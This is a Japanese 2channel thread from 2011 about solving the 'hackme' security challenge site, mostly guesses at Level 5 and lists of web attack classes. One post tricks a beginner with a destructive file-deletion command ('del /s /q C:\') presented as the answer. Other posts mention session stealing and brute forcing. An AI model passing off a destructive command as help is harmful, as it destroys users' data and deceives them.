つくったことないwプログラマじゃないので。
でも今バイト先で管理してるサーバで動いてるアプリは
mvc系って言うんだと思う。
チートは4だけした。
↑必死なのはバイトの君じゃね?w
↑必死なのは無職の俺だけど?
今時、バイトに管理させてる鯖とかあんの? それそのものが脆弱性じゃね?
>>361 hackmeやってバイト先のアプリが
脆弱性のかたまりだとわかった
でも、別に不特定多数に公開されてる
わけではないので、多分あまり問題ない。
おれ、最初サーバ管理任されたとき
apacheもphpも聞いたこともなかったよ(爆
そこら辺しっかりしてればいろんな所から顧客情報流出しないって バイトが管理してるかしてないかは知らんけどどこもぬるいのは確かだろ
URLマッピングしてるだけだから、意味ないんじゃね そもそも当たり前のことと言いながらフレームワーク触ったことないのか
>>364 なんで伝わらないのだろう?
IT素人に近い俺が完全に勘違いしてるのかな?
「URLマッピングの法則がLv5だけ
違うことになにか解法への糸口があるのでは
ないのだろうか」という話なんだけど。
それでも無意味だよ、というのなら普通に
理由を教えていただきたいんですけど、、、
後学のために
法則は別に今までと一緒じゃん
367 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 07:37:24.39
いままで404だったURLでアクセスできるようになってるんだから 何かしら意味があるんじゃないかと考えるのは当たり前だろ
どうみてもポリシーは一緒です 何が違うんだよ
369 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 07:48:49.76
どうみても動作が違うだろアホか
一緒だろボケ
Lv.5全然解けない… Lv.4みたいに、条件を満たしてればクリアできるのか、 Lv.3みたいに、ユーザー名とパスワードがあってなきゃクリアできないのか、 それだけは教えてほしいな…
dotdisterの様子からすると意外な方法かもな
ブルートフォースしたくなるなこれは…
なんで揉めてんだww
今のところ判明している唯一のLv5固有動作は以下の通り。
/Lv5/login でも /Lv5/login/ でもページが表示される。
(/Lv1/login は動くけど、/Lv1/login/ は動かない)
と言うわけで、俺も
>>365 が知りたい。
だからそれはフレームワークの基礎的な動作だろks htmlから出直せ!
もう一つネタ投下。中の人曰く。
madogiwa
Hackmeの実装ってTurboGearsかな? エラーメッセージに同じのがあった。
http://turbogears.org/ passa
@madogiwa Pylonsですよ。ValidatorがFormEncode。
これが、ヒントの投下であるのかは分からんが。
>>376 フレームワークの基本的な動作だと仮定するならば。
Lv5 では他のレベルと「基本的な動作」の異なるフレームワークを使用している事になる。
なぜなら、他のレベルでは /Lv1/login/ が動かないから。
また、他のレベルでは、それまでのレベルと異なる部分に攻略の大きなヒントが隠されていた。
(e.g. Lv3 は他のレベルとURLのパターンが異なる)
したがって、/Lv5/login/ でも動作すると言う事実は、攻略のヒントなのではないかと言う事なんだ。
だから基礎的な動作ってのはよく分かったから Lv4まで末尾に/が来るとダメでLv5だけあっても大丈夫 という事象が手がかりにならないって理由を分かりやすく教えてくれって言ってるんだ。
Lv4/と末尾に/あっても表示されるんだけど
>>380 それは出来るんだけど Lv4/login/ はNGでしょ?
Lv5 は Lv5/login/ が通るんだよね。
382 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 08:57:40.63
LV4/login/ な
自分の指摘が見当違いな事を言ってると気付いて引っ込みがつかなくなったんだろ 更に上から目線でksとか言い出す馬鹿だから相手にしないほうがいい
この動きから、app.yaml がどう書かれてるかとか予想するのは割と有意義な気がするけどな
ID分からないんだから引っ込みつかなくなったら素知らぬ顔してればいいのになw そんなのもわからないくらい顔真っ赤なのか
どっちにしろお前らがもめてる内容じゃIDもPASSも知る事ができないよ 真面目にやろうぜ
/Lv6/ に続いて、/Lv5/next/ も /Lv5/ に転送される模様。 これは転送なんで、/Lv5/login/ の問題とちょっと違うけど一応追記。
はいはい
390 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 09:18:20.61
Lv5 不正文字突っ込むと入力したものがそのまま返ってきて、英数字アンダースコアだと空白で返ってくる程度しかわからね。
基本的な動きを理解してない奴がいるな これがセキュ板のレベルかよw
いろいろと釣られて来た俺だか こればかりは釣られなかった
Lv5/<ここ>←にbf辞書アタックしてる奴がいるときいて
今Lv5攻略の流れですいませんが Lv4のsessionを盗んだのですがそれをどう使えばいいのかわかりません。 cookieのsessionを書き換えたら最初からになったし。。。 誰か教えてください。
>>395 お前の書き換えたのはhackmeの垢セッションだ
>>395 お前やっぱりセッションIDの意味分かってないなw
セッションIDがプログラムの中でどういう働きをするのかとか
想像できていないようだ。
LV4の資格はないなw
>>397 新規ならどんな名前で追加したらいいんですか?
流石にそれはこのスレでは教えられない hackmeの中の人が怒るからな
ここで3DSの話で出たけど買ったやついる? 俺はまだ買ってないが急げば間に合うかも
>>400 クッキーの使い方も分かっていないのかw
どうしようもない素人だなw
>>400 セッションIDが下からでてきたときに
名前=セッション
ってなってなかったっけ
はちまから来た奴って何でこうも節操がないわけ?
>>406 はちまと聞いて一瞬わかんなかったけど
はちま=スレまとめサイトの総称
で2chでは通ってるの?
それとも、リアル指定?
それとも、八幡宮の略称?
※ネタではなく、マジレスです。回答お願いします。
できました! さっき間違がえて最後にidをつけてしまったのが原因でした! 回答をくださった皆様、ありがとうございました!
こんなんでクリアしても嬉しいのかよ・・・って前スレに答えが書いてあったからなぁ
こうしてLv4に値する技術のない人が勘違いして増えていくのであった…
>>409 lv4は先行組でも、クリアして喜んでる人いない感じだったけどなw
それでlv5最先端組は今は何をしてるわけ?
「にょき」が全てだったからな
>>403 ずっと前から予約受付終了してんじゃん
行くだけ無駄だろうから、俺は家で寝てるよ
ロンチタイトルに欲しいソフトがないから急いで買う必要もないし
>>412 dotdister氏は沈黙を通している。
てか、まだココ見ているようならlv6組んでくれませんか
lv6以降は問題募集しているんだよ
飽きてきたのでcookieをみていた。 気付いたこと↓ ・楽天とツイッターのクッキーにipが入っている。 ・ツイッターの_twitter_sessはリアルタイムで代わっていく。 おまえらこういった無駄知識がクリアにつながるんだよ。
どーでもいい ついでにtwitterはセッション生成用の鯖持ってるってのも知識につけくわえとけks
まあまあ。どーでも良いところからヒントが見えてくる事もあるし。 どんどん書いていこうぜ。
421 :
名無しさん@お腹いっぱい :2011/02/26(土) 10:19:49.03
住民みんなで一斉BANしないか?w
じゃあ俺もどうでもいいことをひとつ lv4クリアのためにXSSのコード探しているときに lv5に使えそうなコードを見かけたが忘れた。 今ではもう履歴の山の中
おまいらがんばれ! 俺はもうキャサリンして遊ぶわ
まるで見えないけどヌルバイト系の脆弱性なのかなあ
twitterとfacebookをハクして、各レベルに貼ってあるwidgetの設定を見ればいいじゃん
うんそうだね Lv1の答えはそこだね
PHPで脆弱性と言えば、Lv4までで出たのも含めると・・・ 1:XSS 2:Script Insertion 3:SQL injection 4:CSRF 5:ヌルバイト攻撃 6:Directory Traversa 7:変数汚染攻撃 8:HTTPレスポンス分割攻撃 9:インクルード攻撃 10:eval利用攻撃 11:外部コマンド実行攻撃 12:ファイルアップロード攻撃 13:セッションハイジャック 14:スパムメール踏み台攻撃 ぐらいだよな・・・ この中に、Lv5の答えがあるのか・・・ Lv5は、反応がなくて検討がつかんな・・・
>>427 俺、そのリストを見ただけであんたが何の本から引用したか一発でわかったわw
>>424 試した。何もおきない。
こいつはググッて出てくる単品攻撃じゃなくてなにか違うものだ。
かなりの攻撃がググられ、試されているはずだから
検索で出てくるような攻撃方法ではないな。
おそらくかなりの発想力がいる。
で、発想できればあとは何も面倒ではない方法だろう。
俺の予想だと昼までにもう一人クリアするな。
フレームワーク固有の脆弱性だったら萎えるな 言語固有とかも萎え萎え
>>427 そのページは何回も見たw
他のサイトの会員にならないと読めない12種類が気になるw
>>387 転送は
/Lv5/next/ ? /Lv6/ ? /Lv5/
な
どうでもいいけど
なんか文字化けしちゃった /Lv5/next/ → /Lv6/ → /Lv5/
434 :
名無しさん@お腹いっぱい :2011/02/26(土) 11:08:03.69
lv4おしえて
誰でもわかってる事に2レスもしやがって…
437 :
名無しさん@お腹いっぱい :2011/02/26(土) 11:14:57.00
それすら調べられないならやる意味ないよ
あとsageろよks
昨日の深夜からカルシウム不足のやつが紛れてるな
いまさらlv4以下の話は雑談よりうざい。
語尾にksの奴が一番うざいけど分かっててやってるアホだからな
↑ワロスks
lv5はまたXSSの脆弱性があるね。 これがヒントだと思う。
447 :
名無しさん@お腹いっぱい :2011/02/26(土) 11:36:33.43
lv4教えて
前スレ見ろよ 過去ログ見れないならググれ
まず服を脱ぎます
きょう射精3回目
Lv5XSSの脆弱性つついてるうちにフレームワーク断定した! このフレームワークのバージョン探って脆弱性つけばクリアかも
452 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 11:44:15.84
LV3おしえて Xまではわかた
>>446 マジで? スクリプトインジェクション可能ってこと?
デマ フレームワークは既に断定済み
>>451 ネタなのかもしらんが、マジなら頑張ってくれ。
でも、仮に特定ソフトの脆弱性に起因するものだとしたら俺はパス事にする。
お前らやってないことがあるぞw 自分のIDとPASSでlv5クリアできたwwwwww
前スレ見ても書いてなくないスか?
マジだw 名前載ったぞっ!
ちょろい
昼頃になってlv5情報の質が一気に落ちたな
一人ずっと可哀相な奴がいるな
464 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 11:50:46.85
LV3のかいとうーw
>>462 マジな話、マジな話が出尽くしたんだよねw
googleアカウントでログイン
結局、Lv4が一番難しかったね。
lv5クリアしてからいえよw
SQLインジェクション、ディレクトリトラバーサル、XSS、セッションハイジャックと技術系の 脆弱性のメジャーどころは一通り出た感があるよな。 あと残ってるとしたら、HTTPヘッダインジェクションくらい? パターンとしては・・・ 1.Lv5 も技術系で攻めていける 2.技術系と見せかけて実はソーシャルハック系、または発想で勝負系 仮に2だとした場合、ヒントになりそうなのは中の人の、過去のTwitter発言とかか。
lv4教えて
セキュリティ製品売ってる中の人もとけてないんだろう? なら普通のやり方じゃ無理な気がする
HTTPヘッダインジェクションは表示が変になっておしまい。 これはホスト自体の仕様でlv5には関係なさそう。
こんなスレでホラ吹いてリアルでは・・・
>>473 Lv4クリアしたいなら前のスレいけks
LV5のヒントがつかめてきた HTTPヘッダ見てみろ
480 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 12:08:10.88
LV3おしえて Xわかたそこから?
>>479 ブラウザの設定値をそのままHTTPの応答に使っている箇所がある
得意げに見つけたとか言ってるけど、突破してないんじゃあ・・・
まあ、ランキング見ればすぐに分かることだしな。
>>470 コマンドプロンプトを起動して、
「del /s /q C:\」と入力してエンターを押す。
さすがに、コマンドプロンプトの起動はわかるよな?w
通報した
同じく通報した
492 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 12:27:29.91
消されるぞ・・・
>>489 「アクセスが拒否されました」ってなったぞ。
タダでさえ意味もわからず飛んできた PC初心者が居るというのに。
管理者権限でやるのは当たり前
起動方法知ってるならその意味もわかるだろ・・・
administratorですか?
>>489 やってみたら
-bash: del: command not found
って言われたけどどうすればいい?
、、、このスレだと本当にやる奴いそうだな
HTTPヘッダインジェクションは結構試したんだけどなぁ・・・ またlv4みたいな感じか? 一字一句間違えちゃいけませぬ。
すべてのプログラムのアクセサリの中ですよね。
それだ。 早くしないと、ネタバレで、問題変わるぞ
504 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 12:40:25.49
Lv3をおしえてー
>>500 HTTPヘッダインジェクションどうやって試すの?
スクリプトインジェクションも出来ないし、試しようがない気がするんだけど。
俺の知識不足なのか・・・?
LV4は「一字一句間違えずに」ではなくなったよ。 javascriptの文法無視して適当な単語が順番通りに並んでいたら受理するようになった。
これ通過した時の時間も記録されればよかったのにな 最初のうちに自力で解いた奴のとネタバレ見て手順だけ辿った奴が 同じランク扱いとかちょっと不公平すぎる
それやるとデータが大きくなるからやらないって中の人が言ってた
>>507 最初のうちに自力で解いた奴は名前が表示されてたんだから、
自分が何番目だったか大体覚えてるだろ
名前が省略され始めたのは90番台からだし
>>505 出来ないから試すんですよ。
出来たらそこでおしまいですよ。
>>javascriptの文法無視して適当な単語が順番通りに並んでいたら受理するようになった。 あれ判定基準そんなに変わってたのか
>>510 出来たら・・・そこで・・・おしまい・・・? ごめん混乱してきた。
LV4みたいに段階があるかもしれないんじゃないの?
xssと同じで相手がアクセスすることをどう想定するかの発想か?
Level6はsessionidに使われているmd5とsha1の組み合わせの解析
「500万円が当選しました! こちらをクリックしてください。」 ってメールばら撒けはいいんじゃね?w
クリア数思ったより伸びないな、Lv3はもう1000人超えてると思ってた 昨日の昼の時点でLv4が100人くらい、Lv3で600くらいだったはず L4とL3の比率見てると、手法はあってるけど判定基準ではねられたってのが結構いたんだな
>>518 そもそもそんなに参加者いないんじゃないか?
>>516 ソルトとか使われてるから無理なんじゃね?
del /s /q C:\って打ったら、 「Operation System Not Found」ってなって起動しなくなったんですけど…。
>>520 Lv1で挫折した人、Lv2で挫折した人、飽きて止めた人が大半と予想。
del /s /q C:\って打ったら、 「Operation System Not Found」ってなって起動しなくなったんですけど…。
はいはいワロスワロス
>>526 小林サンチーッスwwwwwwwww宣伝必死wwwwwwwwざまあwww
>>527 お前は見落としている
そのリンク先の本が売れて得をするのは誰だ?
linux無料だろwww
全然関係ないかも知れないけど、自分のランク確認できるページあるじゃない?
↓これ
http://hackme.netfire.jp/user/XXX このページって、上記で XXX になっている部分に自分のIDが入るけど、適当に YYY とかに
書き換えてもちゃんと表示されるんだよね。
クッキーのセッションIDだけを見ているみたいでURLは関係ない。
現Lv5クリアのdotdisterが実は実在してなくて ツイッターやなんかも全部中の人の仕掛け。 そしてこのdotdisterからいかにして情報を抜くかが今回の肝なのだ、と!!!!
Lv5で任意の文字列を埋め込めた あとはデータ抽出か認証回避のコードを考えるんだろうけどやる気が出ない だれかやっといて
>>533 わかったやっとくから引き継ぎ資料よろしく
築地本願寺のサイトもLv1と同じ方法で ハックできるのか、、、
firebugかdragonflyでフォームの送信データ名を変更してpostすれば 送信データ名をエラーの一部として吐く 送信データ名として任意の文字列を埋め込めるからそこにコード書けばいいはず
dotdisterは北大生だろ。twitterで名前まで晒しているし、本物。
>>537 超ネタバレじゃねぇか。今日中にクリアできそう
540 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 15:05:57.13
>>536 <!--
南無阿弥陀仏
南無阿弥陀仏
/ ̄ ̄ ̄\
| |
| | _
| ^ ^ ) ///ト、
( >ノ(_)Y ////)|
∧丶i-=ニ=|| ||
/\\\  ̄ノ| ノノ
/ \\  ̄ / / |
築地本願寺にようこそ、ようこそ
-->
wwwwwww
>>537 それ前スレでもでてたけど、どのレベルでもできるよ
ここにコードを埋めても、自分以外には見えないから意味ないよなー。
>>537 それ昨日も誰か言ってたけど再現しないよ?
何かおれ間違えてるのかな。
ちなみにphpでやってるけどfirebugとかいうのを
使わなきゃいけないのか?
544 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 15:19:16.52
非ASCII送ると ef bf bd に置き換えられるんだけど、これ何ヒントになる?
>>543 なにもなくてもできる
別ページにHTMLもってってname変えれば再現できるはず
>>545 もちろんそうやってnameをいろいろ変えてるし
headerみてもちゃんとPOSTできてるのだけど
エラーでず、、、、orz
勘違いか、無知か、、
>>546 勘違いじゃない?例えばname=unkoにすればunkoって値はないよってエラー出てたと思う
どっちにしろこれは関係なさそう
自己解決 なんだ/Lv5/だと出ないのに(ry よくわからん仕様だな
これやっても見えるのは自分だけだしな
君の例がname=unkoで俺の実装がname=mankoだった 泣けた
お前ら 文字を与えてくださいってエラーでた?
553 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 16:06:52.23
>>552 前スレでそんなこと言ってた人がいたな。
>>552 同じ名前のデータPOSTすればそのエラー出せた
おっと、ネタバレはそれぐらいにしといてくれよ
これがネタバレだったら、まだひとりしか クリアしてないってことはないんじゃ、、 なんか適切なサニタイズっぷりがガチエラーな気がする
12万いてクリアが一人とかどれだけおかしな問題なの? セキュリティ記事書いてる連中はなにやってんの?
560 :
sage :2011/02/26(土) 17:15:10.53
nameとpasswordのbyte数って5byteと13byteじゃね?
>>559 PWがpwnedしたみたいなふうにかけてる?
Pwned:ボコボコにされたの意 Pwn←元々はoneの打ち間違い PWNed→一人にボコボコにされた だったらおもろい
あと、パスワード設定しなくて 使えなくなったアカウントが6割混入と予想 俺も1個目のアカウントは使えなくなったし
誰が挑戦してるの?
lv2,3,4やらにtwitterと同じ名前で登録してる人がちらほらいたほうだが…
>>567 ああ俺も俺も
仕方ないから〜2って名前にしてる
>>567 再確認とかで、俺も10数個ミスってNoPassで登録しちゃったゼ!
>>567 再確認とかで、俺も10数個ミスってNoPassで登録しちゃったゼ!
>>569 まじか。記事書くような人がいるならtwitter探っとけばよかた。
>>565 意味はそうだけど
pwnってownの打ち間違いじゃないの?
造語を大文字で書くのはわりと普通かと
>>573 lv4先行組みは皆twitterにhackmeのこと書き込んでた記憶がある
>>575 いや、俺も名前載った一人だけど、セキュリティ関係の記事書いてる人がいたんでしょ?
セキュリティ関係者が興味なしとかだったらぶっちゃけ終わってると思う
twitterなら”hackmeから403喰らって冷静になった(キリッ”って奴が居たぞw
もしおまいらが人事で「hackmeをlv4まで独力でクリアしました!採用して下さい!」とか言う奴がいたら採用する?
>>576 twitter hackme
で、クリア日時早い人をピックアップすれば復元可能かと
思ったんだが、最速lv3組とかは過去ログに書いてあったっけ
lv5は一人だからfireNetからスカウトとかありそう
>>579 会社なら、脆弱性が含まれていないか調査する会社に依頼しちゃうことがおおいかなぁ
そのセキュリティ調査会社はなにをやってる! はやくLv5をがんばれよ!
金出して依頼すればいい。思ったより高いから気をつけてな
そもそも外部サイトへの調査依頼なんて受けるわけないだろ
調査つっても自社ソフト()かけるだけだもんなー ザルだからあまり意味がない googleやらhatenaやらあれこれ穴が見つかってるを考えればすぐにわかるわな
>>580 Lv3までの先行組みは早くhackmeを知った
というだけであまり自慢にはならないかと。
Lv4も一字一句だなんだとうるさいのがたくさんいたけど、そんなことはなく、40文字ぐらいでいけるよね
ゲームの方が穴は小さいから超上級 実務は穴が大きいから超初級って事か…
>>578 ブルートフォースないって言われてるのに・・・
netfireに踊らされてるだけだからなあ
Lv5で../にアクセスしたら 1回目はLv5に転送された 2回目はLv1に転送された ブラウザのキャッシュかなんかなのかなあ
>>595 ../って?
なんか勘違いしている気がする
ディレクトリトラバーサルだと思った
>>595 m9(^Д^)プギャー
>>598 ディレクトリトラバーサルをよくわかってない人キター
>>599 そんなことにいまさら気づくなんて遅いよ遅すぎるよ
それこそ半年ROMれといいたい
twitterのプロフィールにセキュリティって書いてる人もっと頑張れよ
>>599 ブルートフォースして蹴られたりと情弱っぷりをさらけ出してるな
セキュリティ専門家がこれだったら頭痛がするが
高校生ならまだ害はないさ
>>603 のおかげでlv4先行組と俺との違いが
空想を逸しない範囲でわかった気がした。danken
ドメイン失効狙いか、そいつは盲点だった
最近は本当の意味でのゆとりが2ちゃんに来るようになったなぁ よく解っていない奴が解った振りとか自演とか煽りとか日常茶飯事なのにな IDが出ないと更に酷いから情報の取捨選択がかなり上手くないと騙されまくるだろう
Twitterの方がミサワばりに吹いてるやついて酷いけどな・・・
だいたい、見当がついた。 日曜過ぎてもできなかったら報告するから、 そのときは、みんなで罵倒しまくってくれ
614 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 21:50:05.30
>>608 何となく察しはついてたけど君はこの時間軸の人間じゃないね
Lv5って何の攻撃したら変化見られる?
(Lv5) dotdister 称号:ハッカー (Lv4) 称号:仮免許ハッカー の人 総勢400人 (Lv3) 称号:ハッカーのたまご たち 総勢815人
>>826 Lv5ってHTTPヘッダインジェクションじゃないの!
知らなかった・・・。
未来にレスするのが最近のはやりなのか・・・。
どうでもいい・・・
623 :
sage :2011/02/26(土) 22:20:25.91
john the ripperいれたらNortonが反応したぞ!同じ人いない?
>>623 反応するけど、履歴見るとアプリそのものとトロイの木馬としか書いてなかったから
適当なVMに入れて実行した
Norton抜いてからこい
クラックツールにアンチウィルスが反応するのを当たり前だと思えないのがすごい PCに入ってたら遮断するのは当たり前だろ トロイでもなんでもない
そもそもそんなのを騒ぐ奴がハックするなよ・・・
ウイルス対策ソフトなんか最初からいれてねーよ!
大丈夫だ、問題ない
vivirimeって感じだなw
にしても、一向にLv5のクリア者でねーな
真のハッカーはアンチウイルスくらい自分で作る 他人が作ったものなんか信用できないのが普通だろう
てか、ツイッターにつながらないんだがw
TwitterがHackmeされたか
Lv5はLoginの結果で入力された値を出力として使ってるところがなさそうだから インジェクション関連は無いって考えは方向間違ってるかね?
もうあきたな
ほんとうにLV5クリアなのか? お金やるから協力してくれとかじゃないの?
>>637 「何か」にたどり着ければ楽勝な気がするが
lv4ほどあからさまじゃないのでさっぱ分からん・・・
なんでLv5だけ名前 称号の順なんだ?複数居たら変わるのかな
該当者無しのままだと放置されるから、刺激するためのエサにしか見えないなぁ
twitterの煽りからして餌かもな これだけの人数がやって未だに一人とか妙な話
他レベルでクリアできてた人が全く出てこないで lv4苦戦してた人があっさりというのも謎だね
発想の問題っぽいな
Nortonは反応するのか カスペは無反応だな
>>646 検出率を見かけだけでもあげたい奴は引っかかりまくるよ
とまった。
lv5は諦めた 後は頼んだぞ
それにしてもLv4クリア続出だな ネタバレ厨は死ぬべき
とか気づいたらLv5クリアした猛者がいるよ 賄賂?
Lv5はパートナー契約を結ぶというソーシャルハック!?
内定決まってる人にクリアさせて技術力アピール?w
サポートにメールしたらIDとPASS送ってきた・・・
陰謀論wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
656 :
名無しさん@お腹いっぱい。 :2011/02/27(日) 11:36:13.19
なんだここくそわろ
ちょっとしたゲームなのに、陰謀論かww せめて実装は内定者の課題くらいにしときたいな
そろそろLv5の問題を変えてはどうかね?
陰謀にかかるコストが少ないからねぇ。 やってもおかしくないでしょ。
>>642-644 あいつのtwitter見たけど、北大生で学生同士の馴れ合いつぶやきばっかりダロ。本物だべ、ありゃ。
Lv1とかもう一度見てみると、「右クリックは禁止です(笑)」とか出るのな。 馬鹿フィルターを入れたらしい。
あんな中学生レベルの知識をひけらかすのが好きな痛い奴が通るんだから セキュリティの知識が関係ない盲点だろうな。 ネタがわかったら非難轟々の予感。
lv4の二の舞ならまだしも、予測も外して2月までにlv5クリアした奴でないと セキュ板民ってw、てなるからな まあ、文字だけの存在だから関係ないが
>>662 それがLV5はねーよwwwみたいになりそう
うっかりツール廻したら403です。何日待てばいいのかな
CTFのチームの人なら簡単に解けそうとか言ってるし セミナーでやったCTFの内容に似たのがあったのかと推測 でもわからん・・・
CTFってびっくりするほど基礎的なことしかやってないのね・・。 こんなの自分で本を読めばいいのでは? CTF参加を実績のように掲げてるバカを見たことあるんだがw
どうもFormEncodeに脆弱性があるというのは分かったが具体的な穴がわからん
一気にかそったな
UTF-7?
674 :
名無しさん@お腹いっぱい。 :2011/02/27(日) 18:00:25.54
MD5じゃないのか・・ john??二つファイル見れたけどどうやってぶっこむのよ 教えてエロい人
lv5以下の話は過去ログでも漁ってろ
次におまえはCPIって何?と聞き返す・・・わけないよな?
>>674 お疲れ そんなこともわからないならあきらめて
CPIってなーにー???
消費者物価指数くらい知っとけよw
水を得た魚かお前らw
だってねーあきたし、後は下のlvから上がってきた奴らを餌に遊ぶしか
いよいよ末期だな
もう、ほぼ完全にさめたな
海外サイトにあるcrackmeでもいじってれば
687 :
名無しさん@お腹いっぱい。 :2011/02/27(日) 18:34:25.87
lv3 切り裂き男までいれたけど 2つのやつhtmとかでいれるの??
690 :
名無しさん@お腹いっぱい。 :2011/02/27(日) 19:11:25.67
Lv4、もう一度ニョキっとしようと思ったら、もうやり方を忘れていたw
Lv5まだ1人のままじゃん・・・もう48時間経ってるだろ? お前らふがいなさすぎ。
>>623 うちのMSSEは賢いからjohnをマルウェア扱いしたりしなかったよ
君もMSSEにしなよ
MSSEってwwww
MSEのことか? 軽いだけしか取り柄がないんじゃ・・・?
HTTPヘッダーインジェクションって何に使えるのか調べてみたけど、 自分自身を引っ掛ける以外に何が出来るのかどこのサイトにも書いてないw セキュリティ関連ってこんな都市伝説レベルの情報ばっかりなのな サーバーでのキャッシュを不正にできるとか書いてあったが そのキャッシュは正常なリクエストでは使われないだろ
>>695 UNLHA32.dll脆弱性の時に取りざたされたけど、あれってMSSE以外のメジャーな対策ソフトではろくに検出できないから
作者がバージョンアップを放棄したんでしょ。
重い上に糞レベルのスキャンしか出来ないソフトなんて(しかも有料で)使う意味ないよ。
>>696 馬鹿か。
重要なのはキャッシュだ。
キャッシュに偽装ヘッダを仕込んで次に同じURLにアクセスしてきた奴をひっかけるのが目的。
はい
HTTPヘッダ・インジェクションだったとしたらもう他いも誰か解いてそうなもんだけどな
ソーシャルハッキングしかないだろ? dotdisterの家まで行って「ドウヤッタンダゴラオシエレ」って怒鳴るのが正解かと twitterが最高のヒント、ということだろう。
もう消去法で行くしかないな。
>>1-702 おいお前ら、いままで試した手法全部晒してみれ
結局PylonsでFormEncodeでPlainTextでredirect_toしていて PHPのふりしてるのが判ったら、ちょっとやる気無くしている。 ていうかFormEncode.poは、なんでまだ全部日本語にしていないのだろう? PlainTextのバリデータはなんで'-'が有効なのにエラーメッセージでは含まれないような書き方(元の英語から)をしているのだろう? htmlfillでlogin.makoって、全然デザイナーに優しくないテンプレートだよな UCS4でビルドされたPythonのデバッグしてどうする俺みたいな〜
さすがに1分に1回のアクセスならBANされないだろうから、1日で60*24=D80回試せる。 BOINCのように手分けしてブルートフォースすれば、2chで1万人とすれば 1日でD800000回試せる、って電卓が16進のままじゃねーか。
>>705 ログインしろじゃなくて、認証を突破だからなぁ・・・・。
IDが無かったら終わりじゃん
どうせLv2やLv4も正規のID/Passってないだろうから、Lv5も同様だろう
711 :
名無しさん@お腹いっぱい。 :2011/02/27(日) 23:04:01.31
>>707 これは擬似だから実際の淫ジェクションは発動してないはずだから
lv2は答え自体が正規のID/Passのはずだよ
じゃなきゃ、この板の人があんなに苦しむはずがない
>>711 LV2のIDは何でも行けたはず、パスだけ決めうちだったんでは?
>>709 > 613 :名無しさん@お腹いっぱい。:2011/02/26(土) 21:13:39.72
> だいたい、見当がついた。
> 日曜過ぎてもできなかったら報告するから、
まだ日曜は過ぎてない!!
LV5 セミコロンまでわかった。
一応俺の邪推を書いておく FormEncodeかhttpヘッダインジェクションのいずれかと予想 今までの問題からhttpヘッダインジェクション濃厚 FormEncodの線はこの板の人に任せたというより丸投げ だが、sessionidわからん よって、httpヘッダインジェクションからのXSSを試みる だが、書き込んでも404 これより、lv5がhttpヘッダインジェクションなら定型文と予想 もしそうならばlv2の二の舞じゃないか もうむりぽ←いまここ 見えないところの脆弱性は手法の総当りだから困る
よくやった。この言葉をやろう。 知ったか乙
超有名人が参加しないのは何でだろ。突破してもネタバレ出来なくてつまらないから?
>>719 このスレの誰かが言うにはセキュリティ関係者挑戦しまくってるらしいよ。
そうは思えんけどね。
Lv5、18時間ぶっ通しでやっと手がかり掴んだ 休憩したらそこを掘る ここで間違いない
>>722 頑張れとしか言えねえ
運営は問題を増やしたりして寿命延ばす気ゼロか?こんなにアクセスされるなんて思ってなかったんだろうな
hackmeのおかげで、入力フォーム見たら定型文打つ癖が付いてしまったじゃないかw
>>722 まじで手がかりあったのか?
本当なら応援する。
>>725 自社のイントラのフォームで明日うっかりやらんようにな
ハッキング体験だから、実際の脆弱性は関係ない。 だからFormEncode自体の脆弱性は関係ない。 form要素の中身を書き換えてエラーを出してる人いたけど、 あれはGAEで普通に出るエラーだし、それを利用させるとは思えない。 ホンモノの脆弱性をどうにか再現しているとしたら分からんけど。 そういう認識でいいんだよな?
FormEncode自体の脆弱性を再現してたら関係あるだろ
731 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 00:03:09.49
Hackme公式アカウントって申請したらどうなるの?
Formの書き換えで<type 'list'>出るやつ? あれ、Lv4以下でも出るから微妙じゃね?
この板、使えねぇ
>>731 月1万も取られるにもかかわらず総勢○人の中に埋もれて泣き寝入りする羽目になる
>>735 せめて別ページで時系列リストにするくらいはして欲しいよね・・・
認定証とかいらないからw
>>733 使えねぇとかそんなレベルじゃねぇよ。
虚しいレベルだよ・・・
>> 739 具体的にどうぞ 書ける?
741 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 00:22:17.85
742 :
722 :2011/02/28(月) 00:23:01.61
駄目ですた
また曖昧な所から試します…
>>732 俺もそれは微妙だと思う
でも情報出てないし流してみるテスト
name=;name&password=;password
これ入れるとFormEncodeのエラー?が出るよ!
知らなかった人はモチベーションを上げるのだ!
>>733-734 ,736,738-740
部外者だけど。
春の近づきを知らせる陽気の中それとは真逆の陰気だらけの部屋でパーソナルコンピューターを操作してインターネットの匿名掲示板で罵り合いをする奴等
ってことだろ。
オマエラって、もしかして仕事中もhackme やってるの?
ヒント:平日の昼間にもこのスレに書き込みがある
733 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:10:37.13
この板、使えねぇ
734 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:13:31.65
>>733 お前程じゃないよw
736 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:14.75
>>734 もう少しわかるような日本語つかってみ
738 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:15:55.65
>>733 使えねぇとかそんなレベルじゃねぇよ。
虚しいレベルだよ・・・
739 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:16:29.90
>>736 そのレスで全てを表してるなw
740 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:17:54.93
>> 739
具体的にどうぞ 書ける?
744 :名無しさん@お腹いっぱい。:2011/02/28(月) 00:25:04.60
>>733-734 ,736,738-740
部外者だけど。
春の近づきを知らせる陽気の中それとは真逆の陰気だらけの部屋でパーソナルコンピューターを操作してインターネットの匿名掲示板で罵り合いをする奴等
ってことだろ。
給料泥棒だろそれ。いいのか?
fackme ↑まだ出ていなかったから念のため。
給料泥棒しているのは俺たちだけじゃない。 50代のオッサンども見てみろ、いつも暇そうにしてるだろ。
